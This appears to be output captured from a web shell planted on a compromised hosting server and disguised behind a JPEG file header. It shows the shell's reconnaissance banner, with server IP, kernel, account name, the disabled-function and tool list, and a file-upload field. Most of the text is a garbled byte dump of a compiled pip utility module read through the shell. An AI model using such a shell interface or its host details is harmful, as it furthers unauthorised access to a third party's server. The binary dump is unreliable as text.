ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.135 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/thread-self/root/opt/alt/python27/lib/python2.7/site-packages/pip/_internal/utils/ |
Upload File : |
� �Rec @@ s} d Z d d l m Z d d l Z d d l m Z d d l m Z e r[ d d l m Z n d � Z e d � Z d � Z d S( s� This code wraps the vendored appdirs module to so the return values are compatible for the current pip code base. The intention is to rewrite current usages gradually, keeping the tests pass, and eventually drop this after all usages are changed. i ( t absolute_importN( t appdirs( t MYPY_CHECK_RUNNING( t Listc C@ s t j | d t �S( Nt appauthor( t _appdirst user_cache_dirt False( t appname( ( s� /builddir/build/BUILDROOT/alt-python27-pip-20.2.4-5.el8.x86_64/opt/alt/python27/lib/python2.7/site-packages/pip/_internal/utils/appdirs.pyR s c C@ st t j | d t d | �} t j d k rp t j j | � rp t j j d � } | rp t j j | | � } qp n | S( NR t roamingt darwins ~/.config/( R t user_config_dirR t systemt ost patht isdirt expandusert join( R R R ( ( s� /builddir/build/BUILDROOT/alt-python27-pip-20.2.4-5.el8.x86_64/opt/alt/python27/lib/python2.7/site-packages/pip/_internal/utils/appdirs.pyR s "c C@ sH t j | d t d t �} t j d k rA | j t j � d g S| g S( NR t multipatht win32R s /etc( R R ( R t site_config_dirR t TrueR t splitR t pathsep( R t dirval( ( s� /builddir/build/BUILDROOT/alt-python27-pip-20.2.4-5.el8.x86_64/opt/alt/python27/lib/python2.7/site-packages/pip/_internal/utils/appdirs.pyt site_config_dirs&